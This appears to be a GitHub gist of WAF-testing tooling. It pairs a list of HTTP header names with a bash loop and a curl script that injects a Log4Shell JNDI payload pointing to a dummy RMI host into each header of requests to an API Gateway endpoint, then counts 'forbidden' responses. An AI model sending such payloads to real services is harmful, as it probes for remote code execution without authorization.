Skip to content

Instantly share code, notes, and snippets.

@6a6f6a6f
Created December 13, 2021 22:52
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save 6a6f6a6f/bd9b2784e1bd630713aa262901a7a8d8 to your computer and use it in GitHub Desktop.
Save 6a6f6a6f/bd9b2784e1bd630713aa262901a7a8d8 to your computer and use it in GitHub Desktop.
Referer
X-Api-Version
Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Cookie
Forwarded
Forwarded-For
Forwarded-For-Ip
Forwarded-Proto
From
TE
True-Client-IP
Upgrade
User-Agent
Via
Warning
X-Api-Version
Max-Forwards
Origin
Pragma
DNT
Cache-Control
X-Att-Deviceid
X-ATT-DeviceId
X-Correlation-ID
X-Csrf-Token
X-CSRFToken
X-Do-Not-Track
X-Foo
X-Foo-Bar
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Forward-For
X-Forward-Proto
X-Frame-Options
X-From
X-Geoip-Country
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-ProxyUser-Ip
X-Requested-With
X-Request-ID
X-UIDH
X-Wap-Profile
X-XSRF-TOKEN
rm results.txt -f; while IFS= read -r PAYLOAD; do echo "[+] Trying with payload $PAYLOAD" 2>/dev/null; ./req.sh "$PAYLOAD" >> results.txt; done < headers.txt ; i=$(grep -Fi "forbidden" results.txt | wc -l) ; k=$(cat headers.txt | wc -l) ; echo "[+] Total blocks is about $i/$k"
#! /usr/bin/env bash
curl --silent "https://8i17duelvl.execute-api.us-east-1.amazonaws.com/dev/pets" \
-H "$1: \${jndi:rmi://adsasd.asdasd.asdasd}" \
-H "Content-Type: application/json" | jq .
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment